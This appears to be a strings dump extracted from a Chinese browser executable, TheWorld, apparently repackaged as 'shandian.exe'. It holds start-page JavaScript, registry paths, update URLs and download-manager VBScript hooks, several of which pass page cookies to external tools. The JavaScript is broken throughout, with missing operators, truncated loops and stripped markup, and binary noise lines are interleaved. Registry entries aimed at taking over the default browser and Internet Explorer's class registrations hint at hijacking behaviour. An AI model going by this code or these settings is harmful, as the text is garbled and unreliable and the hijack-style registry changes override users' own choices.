    :$ERR_CODE
    URL:    $ERR_URL";
    //twpage.htm tp*
    var _tpLastUrl = "
    var _tpAddURL = '
    var _message_noneURL = '
    //navierr.htm
    function twRS (str) {document.write(str);}
    var tip_show, g_s_id = external.twGetSecurityID(window), isTpShow, _userPages;
    var tTp = external.twGetDailyTips(g_s_id);
    if(tTp && tTp.length)
    isTpShow = true, tipText.innerHTML = tTp;
    isTpShow = false, _id('topImg_3').style.filter = 'alpha(opacity=50)', endLine.style.display = 'inline', dailytips.style.display = 'none';
    _id('topImg_3').style.filter = 'alpha(opacity='   (tip_show == '0' ? 50 : 99)   ')';
    endLine.style.display = tip_show == '0' ? 'inline' : 'none', dailytips.style.display = tip_show == '0' ? 'none' : 'inline';
    btn.innerHTML = "";
    tip_show = external.getOptionValue(g_s_id, "twhome", "showtip"), Tipshow();
    var url_loaded = 0, url_show = '', lastUrlName = [], lastUrl = [], ctLt = 0,
    oldUrlName = [], oldUrl = [], ctOld = 0, twurldivTemp = document.createElement( "div" );
    function tw_getUrlData(i, t){
    return external.twgetlasturl(window, '', i, t ? 1 : 0);
    external.twdeletelasturl(window, '', str_url = (t ? lastUrl : oldUrl)[num = Number(i)], t ? 0 : 1), (t ? lastUrl : oldUrl)[num] = "";
    for(var i = 0; str_data = tw_getUrlData(i, 0); i   , ctLt   )
    arr_temp = str_data.split(str_data.indexOf("**") != -1 ? "**" : "::"), lastUrl[i] = arr_temp[0], lastUrlName[i] = arr_temp[1];
    for(var i = 0; str_data = tw_getUrlData(i, 1); i   , ctOld   )
    arr_temp = str_data.split(str_data.indexOf("**") != -1 ? "**" : "::"), oldUrl[i] = arr_temp[0], oldUrlName[i] = arr_temp[1];
    function URL_Openall(){
    var lists = document.getElementById("url_item").getElementsByTagName("a");
    for(var i=0;i
    SetArray(g_nCountVB  ,lists[i].href);
    _userPages || (external.twclosetab(window,''));
    function OnBodyKeydown () {
    13 == event.keyCode && URL_Openall();
    function Url_LoadItem() {
    if(document.getElementById("lasturl").currentStyle.display=="none")
    url_loaded = 1, strHTML = document.createElement('ul');
    if (lastUrl.length oldUrl.length == 0)
    return (url_show = '0', lasturl.style.display = 'none', _id('topImg_2').style.filter = 'alpha(opacity=50)');
    if(i>lastUrl.length-1)
    candidate.push("
  • " filter(lastUrlName[i]) "
    • ");
    while(availSize>=0 && j<=oldUrl.length-1){
    candidate2.push("
  • " filter(oldUrlName[j]) "
    • ");
    strHTML.innerHTML = candidate2.join("") candidate.join("");
    url_item.appendChild(strHTML);
    for(var i = 0, tA = _tag('a', strHTML); i < tA.length;i  ){
    tA[i].className = tA[i].offsetWidth > 618 ? 'overflowHide' : '';
    function Urlshow(){
    _id('topImg_2').style.filter = 'alpha(opacity='   (url_show == '0' ? 50 : 99)   ')';
    lasturl.style.display = url_show == "0" ? "none" : "inline";
    url_loaded || Url_LoadItem();
    function Url_showSwitch() {
    tw_setOptVal("twhome", "showurl", url_show = url_show == "0" ? "1" : "0"), Urlshow();
    function InitUrlList() {
    btn.innerHTML = "";
    url_show = external.getOptionValue(g_s_id, "twhome", "showurl"), url_show = url_show || '1', Urlshow();
    function clearFullUrl () {
    for(var i = 0, tU = lastUrl,tOU = oldUrl; i < tU.length   tOU.length; i   )
    external.twdeletelasturl(window, '', i < tU.length ? tU[i] : tOU[i - tU.length], i < tU.length ? 0 : 1);
    lastUrlName = [], lastUrl = [], oldUrlName = [], oldUrl = [];
    url_item.innerHTML = '', url_show = '0', Urlshow();
    function getDomainByUrl( strUrl ) {return strUrl.replace(/^(http:\/\/[^\/] )\/.*/g, "$1");}
    var tryPath = external.twGetAppPath(g_s_id), strUrl = "user2.gif", tId = encodeURIComponent(strDomain)   parseInt(Math.random() * 1000, 10);
    if (strDomain && strDomain.length)
    strDomain  = (strDomain.length - 1 != strDomain.lastIndexOf("/") ? '/' : ''), strUrl = strDomain.length > 1 ? strDomain   "favicon.ico" : strUrl;
    tImg.onload = function () {_id(tId).src = this.src;}
    tImg.src = tryPath   '/ImgCache/'   strUrl.replace(/\w*:\/\//, '').replace(/\//g, '_');
    return "";
    while(line = external.getOptionValue(g_s_id, "twhome", "qp" i)){
    dataList.push(line);
    return (dataList.length==0)? null:dataList;
    this.clearData();
    if(!dataList.length)
    for(var i=0,len=dataList.length;i
    external.setOptionValue(g_s_id, "twhome", "qp" i, dataList[i]);
    external.setOptionValue(g_s_id, "twhome", "qp" i, '');
    function QP_assign(url){
    external.twnewnavigate(window, g_s_id, url, 0, 0, 0, 0);
    function QP_adjustUrl(url){
    if(pattern.test(url))
    return url;
    return "http://" url;
    var list = QPLocalDataMgr.readData();
    var strBuf = external.GetQuickPathValue(g_s_id);
    if(strBuf.length){
    list = strBuf.split(":&:");
    list.pop();
    if(list && list.length>0) {
    for(var i = 0; i < _strQPItem.length; i    )
    temp = _strQPItem[i].split( ":^:" ), strDomain = getDomainByUrl( temp[0] ), strHTML  = "
  • "   QP_InsertFavIcon( strDomain )   ""   filter(temp[1])   "
    • ";
    qp_item.innerHTML = strHTML   "";
    for (var i = 0, tA = _tag('a', qp_item);i < tA.length; i   )
    tA[i].className = tA[i].offsetWidth > 122 ? 'overflowHide' : '';
    _userPages = false, qp_tip.style.display='inline', qp_item.style.display='none';
    _id('topImg_1').style.filter = 'alpha(opacity='   (qp_show == '0' ? 50 : 99)   ')';
    quickpath.style.display = (qp_show == '0' ? 'none' : 'inline'), qp_show == '0' || QP_LoadItem();
    btn.innerHTML = "";
    qp_show = external.getOptionValue(g_s_id, "twhome", "showqp"), QPshow();
    for(var i = 0; i < _strQPItem.length; i    )
    temp = _strQPItem[i].split(":^:"), SetArray(g_nCountVB   , temp[0]);
    for(var i = 0, strName, col = _tag('li', ul_item), colInput, colInputURL; i < col.length; i    ) {
    colInput[0].style.backgroundColor = '', colInput[1].style.backgroundColor = '';
    if (colInput[1].value.trim()) {
    colInputURL = colInput[1].value.trim();
    if(!validateInput(colInputURL)) {
    colInput[1].style.backgroundColor = '#f00', colInput[1].focus();
    strName = colInput[0].value.trim();
    colInput[0].style.backgroundColor = '#f00', colInput[0].focus();
    strBufSave  = colInputURL   ':^:', strBufSave  = (strName ? strName : colInputURL)   ':&:';
    list.push(colInputURL   ':^:'  (strName ? strName : colInputURL));
    else if (colInput[0].value.trim()) {
    colInputURL = colInput[0].value.trim();
    if(colInputURL == '&' || colInputURL.indexOf(':&') != -1 || colInputURL.indexOf('&:') != -1 || colInputURL.indexOf(':^') != -1 || colInputURL.indexOf('^:') != -1) {
    strBufSave  = colInputURL   ':^:'   colInputURL   ':&:';
    list.push(colInputURL   ':^:'   colInputURL);
    external.SetQuickPathValue(g_s_id, strBufSave);
    QPLocalDataMgr.saveData(list);
    if(input == '&' || input.indexOf(':&') != -1 || input.indexOf('&:') != -1 || input.indexOf(':^') != -1 || input.indexOf('^:') != -1) {
    oNewNode.style.padding = '0', oNewNode.style.margin = '0 0 -5 0';
    oNewNode.innerHTML = "
    "  
    ""  
    ""  
    "
    ";
    ul_item.appendChild(oNewNode);
    if(lis.length > 12) {
    for(var i = 12; i < lis.length;)
    tItems.push(ul_item.removeChild(lis[i]));
    ul_item.style.height = ul_item.offsetHeight   'px';
    ul_item.style.overflowX = 'hidden';
    ul_item.style.overflowY = 'auto';
    ul_item.style.marginTop = '0px';
    tWarp.style.width = '530px';
    tTitUl.style.marginRight = '45px';
    tSep.style.marginRight = '40px';
    for(var i = 0; i < tItems.length; i   )
    ul_item.appendChild(tItems[i]);
    else if (lis.length == 12) {
    tWarp.style.width = '505px';
    tTitUl.style.marginRight = '20px';
    tSep.style.marginRight = '15px';
    ul_item.style.height = '', ul_item.style.overflowY = 'hidden';
    _ef.move(_ef.pane.offsetLeft, _ef.pane.offsetTop);
    _tag('textarea', lis[idx ? idx - 1 : lis.length - 1])[0].focus();
    parent = obj.parentElement.parentElement,
    if (col.length <= 6)
    _tag('img', parent)[0].src = 'user2.gif', tArea[0].innerHTML = '', tArea[1].innerHTML = '';
    parent.removeNode(true), col.length == 12 && valiItemNumber();
    function doOperations () {
    var warp = _ef.create('div', '', {'id': 'warp'}, {'border': '1 solid #3499CB','overflow' : 'hidden' , 'width': '505px', 'padding': '0'}), quick = _ef.create('div', '', {}, {'textAlign': 'left', 'padding': '0'}),
    tFrame = _ef.create('div', '', {'className': 'title_frame'}, {'margin': '0', 'padding': '10 0 2 0', 'cursor': 'move'}), ulItem = _ef.create('ul', '', {'id': 'ul_item'}, {'width': '97%', 'margin': '-5 3 5 3'}),
    qp_item = _ef.create('div', '', {'id': 'qp_item'}, {'margin': '-1 5 0 0', 'textAlign': 'left'}), opTool = _ef.create('div', '', {}, {'textAlign': 'left', 'margin': '0 0 0 7'}),
    celBn = _ef.create('button', _tpCancel, {}, {'width': '72px', 'height': '30px', 'margin': '15 0 15 18'}, function () {_ef.close();})
    tFrame.appendChild(_ef.create('div', _tpQuickPath, {'className': 'title_l'}, {'margin': '0 0 0 8'})), tFrame.appendChild(_ef.create('div', '
    ', {'className': 'title_r'}));
    tFrame.onmousedown = function () {
    x = event.clientX, y = event.clientY, isDrag = true, _ef.fade(0.62);
    bEvent.push(_ef.$dom.body.onmousemove, _ef.$dom.body.onmouseout, _ef.$dom.body.onmouseup);
    _ef.$dom.body.onmousemove = function () {
    if (isDrag && window.event.button) {
    var curPX = (_ef.pane.offsetLeft   event.clientX - x), curPY = (_ef.pane.offsetTop   event.clientY - y),
    tWidth = document.body.clientWidth - _ef.pane.offsetWidth, tHeight = document.body.clientHeight - _ef.pane.offsetHeight;
    _ef.move(curPX < 0 ? 0 : curPX > tWidth ? tWidth : curPX,
    curPY < 0 ? 0 : curPY > tHeight ? tHeight : curPY), x = event.clientX, y = event.clientY;
    else if(isDrag && !window.event.button)
    _ef.$dom.body.onmouseup = doMouseUp;
    for (var i = 0, temp, str, nCount = _strQPItem.length; i < (nCount > 6 ? nCount : 6); i    ) {
    temp = _strQPItem[i].split(":^:"), str = getDomainByUrl(temp[0]);
    var tLi = _ef.create('li', '', {}, {'padding': '0', 'margin': '0 0 -5 0'}), tDiv = _ef.create('div', '', {}, {'paddingLeft': '0px'});
    tDiv.innerHTML  = QP_InsertFavIcon(i < nCount - 1 ? temp[0] : null);
    tDiv.innerHTML  = "";
    tDiv.innerHTML  = "";
    tDiv.innerHTML  = "";
    tLi.appendChild(tDiv), ulItem.appendChild(tLi);
    _ef.open(), qp_item.appendChild(ulItem), qp_item.innerHTML  = ''   _tpAddURL   '';
    opTool.appendChild(_ef.create('button', _tpOK, {}, {'width': '72px', 'height': '30px', 'margin': '15 30 15 10'}, function () {QP_Save() && (location.reload())})),
    opTool.appendChild(celBn),
    qp_item.appendChild(opTool), quick.appendChild(tFrame), quick.appendChild(_ef.create('div', '', {'id': '_tw_quick_separator', 'className': 'separator'}, {'margin': '0 15 -10 15'}));
    quick.appendChild(_ef.create('div', ''   _tpName   '', {'id': '_tpName'}, {'styleFloat': 'left', 'width': '200px', 'textAlign': 'left', 'paddingLeft': '39px', 'fontSize': '12px', 'margin': '0'})),
    quick.appendChild(_ef.create('div', ''   _tpAddress   '', {'id': '_tpAddress'}, {'styleFloat': 'left', 'width': '280px', 'textAlign': 'left', 'paddingLeft': '37px', 'fontSize': '12px', 'margin': '0'})),
    quick.appendChild(qp_item), warp.appendChild(quick), _ef.setBody(warp);
    _ef.move((_ef.$dom.body.offsetWidth - 515) / 2, (_ef.$dom.body.clientHeight - 480) / 4), valiItemNumber(1);
    isDrag = false, _ef.fade(0.99),
    _ef.$dom.body.onmousemove = bEvent[0] || null,
    _ef.$dom.body.onmouseout = bEvent[1] || null,
    _ef.$dom.body.onmouseup = bEvent[2] || null,
    document.body.onkeypress = function doKeyPress() {
    if (event.keyCode == 13)
    return QP_Save() ? location.reload() : false;
    celBn.onblur = function () {
    clImg.offsetWidth && clImg.focus();
    external.SetOptionValue(g_s_id, n, k, v);
    String.prototype.trim = function () {return this.replace(/(^\s*)|(\s*$)/g, '');}
    str = str.replace(/&/g, '&');
    str = str.replace(/
    str = str.replace(/>/g, '>');
    str = str.replace(/'/g, '´');
    str = str.replace(/"/g, '"');
    str = str.replace(/\|/g, '¦');
    function _id (id) {return document.getElementById(id);}
    P#VQm.ZJN4
    version="2.0.0.1"
    name="TheWorld.exe"/>
    name="Microsoft.Windows.Common-Controls"
    version="6.0.0.0"
    publicKeyToken="6595b64144ccf1df"
    7>Url
    %XZ9A
    }).bf~
    whCQ D.hs
    z"%U?
    .IDATx
    weBR&E
    \/:*?"<>|
    %s\%s
    %s\%s.url
    %s(%d)%s
    %d,0,0,0,700,0,0,0,%d,0,0,0,0,%s
    %d,0,0,0,0,0,0,0,%d,0,0,0,0,%s
    %sskin\%s
    by %s ver: %s
    %s: %s
    by %s, ver: %s
    %sskin\%s\preview.png
    %sskin\%s\skin.ini
    res://%s/IMG_PREVIEW
    plugin.ini
    theworld.ac
    ADDRESS_URL
    http://www.fjmjm.com/web/navierr
    Software\Microsoft\Internet Explorer\TypedUrls
    %s\%s\
    %s\*.*
    Psc.js
    bypassdomain%d
    url%d
    exdm%d
    redm%d
    boundm%d
    exd%d
    red%d
    exh%d
    reh%d
    bypass%d
    qzone.qq.com
    http://
    %*.*f
    %s%u.dat
    %sca%u.dat
    tw_form_url
    password
    form.ini
    login
    nick
    loginuser
    %s%saction=f&ver=%s&guid=%s
    %s%saction=a&ver=%s&guid=%s
    %s%saction=m&ver=%s&guid=%s
    http://stat.fjmjm.com/web/theworld2up.ini
    2.4.1.9
    SUBVER_%s
    %sTheWorld_%s_%s.zip
    TheWorld.exe
    %s%s%s
    TheWorld.ini
    %s %s
    Update.ini
    WWW_OpenURLNewWindow
    WWW_OpenURL
    %d_info
    %d_url
    dltool.ini
    TheWorld.xml
    %c:\%s\
    %s.%s
    index.htm
    %s#MetalinkFile%d
    DefaultPassword
    DefaultLogin
    StateWindowSize
    %H:%M:%S
    %Y-%m-%d %H:%M:%S
    Path%d
    1.0.0.0
    2.0.0.0
    %s%s(%d)%s
    %s KB
    %s %s, %s
    %s,%s
    MIME\Database\Content Type\%s
    .aspx
    %d:%s
    %d.%d.%d %s
    0xx
    Name:%s
    Version:%s
    FileVersion:%s
    CmdLine:%s
    Module:%s
    Module Version:%s
    Code:%s
    Offset:%s
    OS Version:%s
    IE Version:%s
    multipart/form-data; boundary=%s
    http://feedback.theworld.cn/collection/
    dbghelp.dll
    |.url|.lnk|.htm|.html|.txt|
    http://www.theworld.cn/client/sync
    favsorder.db
    %s*.*
    .ShellClassInfo
    %s\Desktop.ini
    FAV_URL
    %s (%d)
    ,tww=d
    %s_url
    .shtml
    %s://%s/favicon.ico
    %s%s_favicon.ico
    %s\url.dll
    http://about:blank
    "%s" "%%1"
    %s\%s\command
    https
    %s\%s\UserChoice
    .mhtml
    .shtm
    Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
    Software\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice
    Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
    Software\Microsoft\Windows\Shell\Associations\UrlAssociations\ftp\UserChoice
    TheWorld.AssocFile.MHT\Shell
    TheWorld.AssocFile.HTM\Shell
    TheWorld.HTTP\Shell
    TheWorld.AssocFile.MHT\DefaultIcon
    IE.AssocFile.MHT\DefaultIcon
    TheWorld.HTTP\DefaultIcon
    TheWorld.AssocFile.HTM\DefaultIcon
    IE.AssocFile.HTM\DefaultIcon
    IE.HTTP
    IE.AssocFile.MHT
    IE.AssocFile.HTM
    TheWorld.HTTP
    TheWorld.AssocFile.MHT
    TheWorld.AssocFile.HTM
    SOFTWARE\Classes\.mhtml
    SOFTWARE\Classes\.mht
    SOFTWARE\Classes\.shtml
    SOFTWARE\Classes\.shtm
    SOFTWARE\Classes\.html
    SOFTWARE\Classes\.htm
    ftp\shell
    https\DefaultIcon
    http\DefaultIcon
    %SystemRoot%\system32\url.dll,0
    https\shell
    http\shell
    CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32
    SOFTWARE\Clients\StartMenuInternet\%s\shell\open\command
    IEXPLORE.EXE
    SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command
    SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE
    SOFTWARE\Clients\StartMenuInternet\%s\
    -1,-1,-1,-1
    CLSID\%s\TreatAs
    CLSID\%s\LocalServer32
    CLSID\%s\InprocServer32
    %s\CLSID
    Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
    %s\Internet Explorer\iexplore.exe
    ftp://
    https://
    .net.cn
    .com.cn
    *www.*.*
    %s%s\
    skin.ini
    %sUpdate\%s\
    Version%d
    File%d
    Name%d
    dailytips.ini
    %slanguages\dailytips_%s
    %s?ver=%s&c=%d&guid=%s
    Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION
    Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
    ?url=
    Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WEBOC_OMNAVIGATOR_IMPLEMENTATION
    HisSearchLeftPad
    system32\verclsid.exe
    CLSID\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\TreatAs
    wininet.dll
    kernel32.dll
    shell32.dll
    D27CDB6E-AE6D-11cf-96B8-444553540000
    6BF52A52-394A-11d3-B153-00C04F79FAA6
    22d6f312-b0f6-11d0-94ab-0080c74c7e95
    02BF25D5-8C17-4B23-BC80-D3488ABDDC6B
    CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA
    %s\vbscript.dll
    [^"' >]*
    [^"' >]{1}
    $ -^|:'./"()[]{}
    [^"' >]*?
    ntdll.dll
    %s%s.url
    |.url|
    TWINFO.HTM
    InsertInfoItemByHTML( %d, %d, %d, "%s", "%s" );
    SearchLeftPad
    AdressLeftPad
    %s:%s
    Software\Microsoft\Windows\CurrentVersion\Internet Settings
    http://www.fjmjm.com/cn/help-appendix-04.htm
    http://www.theworld.cn/
    http://www.fjmjm.com/cn/help.htm
    TWFORM.HTM
    StatusPluginKey
    http://www.fjmjm.com/cn/guide/guide_start.htm
    http://www.fjmjm.com/wz
    http://bbs.fjmjm.com
    %s&guid=%s&lastver=%s
    2.1.2.2
    2.1.2.4
    2.1.0.2
    2.0.5.1
    2.0.3.4
    2.3.0.7
    2.3.0.8
    2.2.1.0
    2.2.1.2
    2.2.1.4
    NAVIERR.HTM
    TheWorld.ico
    http://www.google.com.hk/search?client=aff-cs-worldbrowser&forid=1&ie=utf-8&oe=UTF-8&hl=zh-CN&q=%s
    http://www.google.com.hk/search?q=
    baidu.com/baidu?
    baidu.com/s
    https:
    TheWorld2_AppHotKey
    (%d-%d, %d-%d)
    %%SaveObjUrl
    MediaSaver.js
    %sMouseGesture_%d.bmp
    %s%s\MouseGesture_%d.bmp
    RecentUrl
    OldUrl
    LastUrl
    TempUrl
    LockUrl
    TWHOME.HTM
    [TempUrl]
    http://%s
    twcache.ini
    %s(%u)
    %d*%d
    external.menuArguments
    General_%d
    %s%s\%s\plugin.ini
    %s%s\%s
    TWSTATUSMSG
    {1FBA04EE-3024-11D2-8F1F-0000F87ABD16}
    CLSID\%s
    SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
    TWOPTIONS.HTM
    %s\%s\%s
    %sUpdate.ini
    SetSearchKey
    twgetlasturl
    twdeletelasturl
    ImportExportFav
    GetXmlHttpObj
    \theme.ini
    %sStartPage\Components\%s
    %sStartPage\Themes\%s
    %s,%s,%s
    twcommon_%d
    http://www.theworld.cn/client/down
    http://www.theworld.cn/client/up
    http://theworld.cn/
    http://fjmjm.com/
    http://www.fjmjm.com/
    %sTheWorld\Update\
    %s.zip
    Load VBScript.dll failed
    %s|%s
    %s - %s
    http://www.
    XMLRequestMsg
    SaveClosedUrl
    AddressHistory
    AAutoKey
    SAutoKey
    BossKey
    UseBossKey
    HTTPFilter
    ShowLUrlList
    SafeExecAll
    SafeExec
    TreatFBKeyAsTabKey
    %s%s%s%s
    google.com.hk
    google.com
    zhidao.baidu.com
    http://www.google.cn/search?client=aff-cs-worldbrowser
    google.cn
    http://www.google.cn/webhp?client=
    *@*.txt
    :\e161255a-37c3-11d2-bcaa-00c04fd929db
    Software\Microsoft\Internet Explorer\TypedURLs
    %s?ver=%s&guid=%s&c=%d
    http://www.fjmjm.com/web/inst.htm
    http://www.fjmjm.com/web/uninst.htm
    Site.ini
    MFC42U.dll
    %s?url=%s&domain=%s&code=%u
    http://www.fjmjm.com/web/
    AB.GIF
    LOGO.JPG
    LOGO.GIF
    LOGO.PNG
    shdoclc.dll/
    ieframe.dll/
    =http://auto.search.msn.com
    color:#000000; background:#%s
    %page.url
    errorUrl
    ieframe.dll
    SHDOCLC.DLL
    https://www
    http://www
    0%d:^:%d:^:%d:^:%d:^:%s:^:%s
    LeftPad
    mailto:?subject=From Browser&body=%s
    https://spreadsheets.google.com/
    http://spreadsheets.google.com/
    https://docs.google.com/
    http://docs.google.com/
    00000409
    00000404
    REST %d
    200 PORT
    HTTP/1.1
    Content-Type: %s
    Content-Length: %d
    Cookie: %s
    User-Agent: %s
    Range: bytes=%s-
    546865576F726C64-86C36F73-2C25-4a7d-91EA-F5581018A42D
    http://127.0.0.1/%s
    :/\*?"<>|.
    %d.%d.%d.%d
    \StringFileInfo\xx\%s
    %s%d.%s
    mapi32.dll
    iexplore.exe
    http://www.google.cn/search?client=aff-cs-worldbrowser&forid=1&ie=utf-8&oe=UTF-8&hl=zh-CN&q=
    %s???.dll
    %u - ???
    %s.tmp
    %s.ini
    advapi32.dll
    %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s
    res://%s/%s
    rSHDOCVW.DLL
    %s   %s
    i\internet explorer\iexplore.exe
    Msxml2.XMLHTTP.2.0
    Msxml2.XMLHTTP.3.0
    Msxml2.XMLHTTP.4.0
    Msxml2.XMLHTTP.5.0
    dwmapi.dll
    uxtheme.dll
    RebarC%d
    RebarB%d
    RebarA%d
    Local\%d%s
    res://%s/
    %sskin.ini
    skin\%s
    XTabDrag:%s
    USER32.DLL
    %Documents and Settings%\%current user%\Local Settings\Temp\
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\
    %WinDir%\
    c:\program files\shandian\bin\shandian.exe
    C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\TheWorld\Update\
    C:\PROGRA~1\shandian\bin\Site.ini
    C:\PROGRA~1\shandian\bin\theworld.ac
    tart downloading from site: http://123.sogou.com/?22014
    http://www.fjmjm.com/web/welcome_cn.htm?ver=2.4.1.9&guid=a64f77031449b9089cdde8cb20ce31cb68f4c3c5f08e420ebe5bab809d844309140398
    http://www.jlbnh.com
    C:\PROGRA~1\shandian\bin\twcache.ini
    %Documents and Settings%\%current user%\Favorites
    %Documents and Settings%\%current user%\Local Settings\History
    C:\PROGRA~1\shandian\bin\TheWorld.xml
    res://%Program Files%\shandian\bin\shandian.exe/NAVIERR.HTM
    http://www.fjmjm.com/web/welcome_cn.htm?ver=2.4.1.9&guid=a64f77031449b9089cdde8cb20ce31cb68f4c3c5f08e420ebe5bab809d8443091403989454&lastver=
    %Program Files%\shandian\bin\shandian.ini
    res://%Program Files%\shandian\bin\shandian.exe/IL_GESTURE
    res://%Program Files%\shandian\bin\shandian.exe/
    ARROW.GIF
    CALLAPSE.GIF
    CALLAPSE_HOVER.GIF
    CANCEL.GIF
    CLOSE.GIF
    DELETE.GIF
    EFFECT.JS
    EXPAND.GIF
    EXPAND_HOVER.GIF
    FORMTITLE.GIF
    HELP.GIF
    INCREASE.GIF
    INFO.GIF
    INFO_1.GIF
    IOAGE.CSS
    LINE.GIF
    MORE1.GIF
    MORE2.GIF
    OK.GIF
    SZTOP.GIF
    SZTOP2.GIF
    TOP1.GIF
    TOP2.GIF
    TOP3.GIF
    TWFORMDEFINE.JS
    TWOPTIONS.JS
    TWOPTIONS.VBS
    TWOPTIONSDEFINE.JS
    TWPAGE.CSS
    TWPAGE_DELETE.GIF
    TWPAGE_OLD.GIF
    TWPAGE_TOP.GIF
    TWWEBDEFINE.JS
    TWWEBUTIL.JS
    USER.GIF
    USER2.GIF
    ProgID=JetCar.Netscape
    Script=On Error Resume Next:set JetCarCatch=CreateObject("JetCar.Netscape"):if err<>0 then:MsgBox("FlashGet not properly installed!"  vbCrLf "Please install FlashGet again"):else:call JetCarCatch.AddUrl("%d_url","%d_info","%page.url"):end if
    ProgID=FG2CatchUrl.Netscape
    Script=On Error Resume Next:set JetCarCatch=CreateObject("FG2CatchUrl.Netscape"):if err<>0 then:MsgBox("FlashGet 2 not properly installed!"  vbCrLf "Please install FlashGet 2 again"):else:call JetCarCatch.AddUrl("%d_url","%d_info","%page.url"):end if
    ProgID=BHO.IFlashGetNetscape
    Script=On Error Resume Next:set JetCarCatch=CreateObject("BHO.IFlashGetNetscape"):if err<>0 then:MsgBox("FlashGet mini not properly installed!"  vbCrLf "Please install FlashGet mini again"):else:call JetCarCatch.AddUrl("%d_url","%d_info","%page.url"):end if
    ProgID=NetAnts.API
    script=On Error Resume Next:set NetAntsApi=CreateObject("NetAnts.API"):if err<>0 then:MsgBox("NetAnts not properly installed on this PC!"):else:if NetAntsApi.IsUrlExist("%d_url") then : MsgBox("%d_url" vbCrLf "already in queue"):else:call NetAntsApi.AddUrl("%d_url", "%d_info", "%page.url"):end if
    ProgID=LeechGetIE.AddURL
    script=On Error Resume Next:set LeechGet=CreateObject("LeechGetIE.AddURL"):if err<>0 then:MsgBox("LeechIE.dll is not registered. Please run `regsvr32.exe LeechIE.dll'"):else:call LeechGet.AddUrl("%d_url"):end if
    ProgID=LeechGetIE.LeechIE
    script=On Error Resume Next:set LeechGet=CreateObject("LeechGetIE.LeechIE"):if err<>0 then:MsgBox("download express is not installed yet"):else:call LeechGet.AddUrl("%d_url"):end if
    ProgID=dapie.catcher
    script=On Error Resume Next:set DAPExt=CreateObject("dapie.catcher"):if err<>0 then:MsgBox("DAPIE.DLL is not registered or corrupted. Please re-install Download Accelerator Plus"):else:call DAPExt.MenuUrl("%d_url", "%page.url", ""):end if
    ProgID=NTIEHelper.NTIEAddUrl
    Script=On Error Resume Next:set Obj=CreateObject("NTIEHelper.NTIEAddUrl"):if err<>0 then:MsgBox("NetTransport2 not properly installed!"  vbCrLf "Please install NetTransport2 again"):else:call Obj.AddLink("%d_url","%d_url","%d_info"):end if
    ProgID=ThunderAgent.Agent
    script=On Error Resume Next:set ThunderAgent = CreateObject("ThunderAgEnt.Agent.1"):if err<>0 then:
    MsgBox("Thunder is not installed properly!Please Install IDM again"):
    call ThunderAgent.AddTask4("%d_url", "", "", "%d_info", "%page.url", -1, 0, -1, document.cookie, "", ""):call ThunderAgent.CommitTasks2(1):set ThunderAgent = nothing:end if
    ProgID=xunleibho.CatchRightClick.1
    script=On Error Resume Next:set ThunderApi = CreateObject("xunleibho.CatchRightClick.1"):if err<>0 then:
    Info="#*01#*"   "%d_url"   "#*02#*"   document.Url   "#*03#*"   "%d_info"   "#*04#*thunder_mini#*05#*"\nr=ThunderApi.sendUrl(Info)
    Info="#*01#*"   "%d_url"   "#*02#*"   document.Url   "#*03#*"   "%d_info"   "#*04#*
    4#*05#*"\nr=ThunderApi.sendUrl(Info)
    ProgID=ThunderServer.WebThunder.1
    Script=On Error Resume Next:Set obj=CreateObject("ThunderServer.WebThunder"):If Err<>0 Then:MsgBox("Web
    not properly installed!"):Else:Call obj.CallAddTask2("%d_url", "%d_info", "%page.url", 1, "", "", ""):End If
    ProgID=NxApi.myComponent
    script=On Error Resume Next\nset WGApi=CreateObject("NxApi.myComponent")\nif err<>0 then\nelse\ncall WGApi.AddUrl("%d_url","%d_info","%page.url")\n\nend if
    ProgID=DuInvoke.Du_Invoke
    script=On Error Resume Next\nset duObject=CreateObject("DuInvoke.Du_Invoke")\nif err<>0 then \n
    MsgBox("DownUp2U not properly installed!"  vbCrLf "Please install DownUp2U again")\n
    else\n call duObject.DownloadOneLink( "%d_url", "%page.url", "%d_info" )\n end if
    ProgID=PNP.InterfaceCore.1
    if left("%d_url", 5) = "is://" then \n window.navigate("%d_url") \n
    ISLink = "is://|link_down|"   "%d_info"   "|"   "%d_url"   "|"   document.Url   "/" \n window.navigate(ISLink)\n end if
    ProgID=TuoTuHelper.RDown
    set xDownCatch=CreateObject("TuoTuHelper.RDown") :if err<>0 then:
    MsgBox("Tuotu
    else: call xDownCatch.AddText( "%d_url", "%d_info", document.Url): end if
    ProgID=QQIEHelper.QQRightClick.2
    Script=On Error Resume Next:set QQRightClick=CreateObject("QQIEHelper.QQRightClick.2"):if err<>0 then:MsgBox("QQDownload not properly installed on this PC!"):else:call QQRightClick.sendUrl2("%d_url",document.Url,"%d_info",document.cookie,0,0):end if
    ProgID=Orbitmxt.Orbit
    Script=On Error Resume Next:Set obj=CreateObject("Orbitmxt.Orbit"):If Err<>0 Then:MsgBox("Orbit not properly installed!"):Else:Call obj.download("%d_url", "%d_info", "%page.url", ""):End If
    ProgID=NXIEHelper.NXIEAddURL
    Script=On Error Resume Next:Set obj=CreateObject("NXIEHelper.NXIEAddURL"):If Err<>0 Then:MsgBox("
    not properly installed!"):Else:Call obj.AddLink("%page.url","%d_url", "%d_info" ):End If
    ProgID=DownlWithIDM.LinkProcessor
    script=On Error Resume Next:set IDMLinkProcessor=CreateObject("DownlWithIDM.LinkProcessor"):IDMLinkProcessor.Execute( external.menuArguments )
    msctls_hotkey32
    HotKey1
    %s-ansi
    %us-unicode
    :http://www.google.com.hk/search?q=%s
    :http://www.google.com
    GWeb
    (*.htm;*.html;*.mht;*.url)|*.htm;*.html;*.mht;*.url|
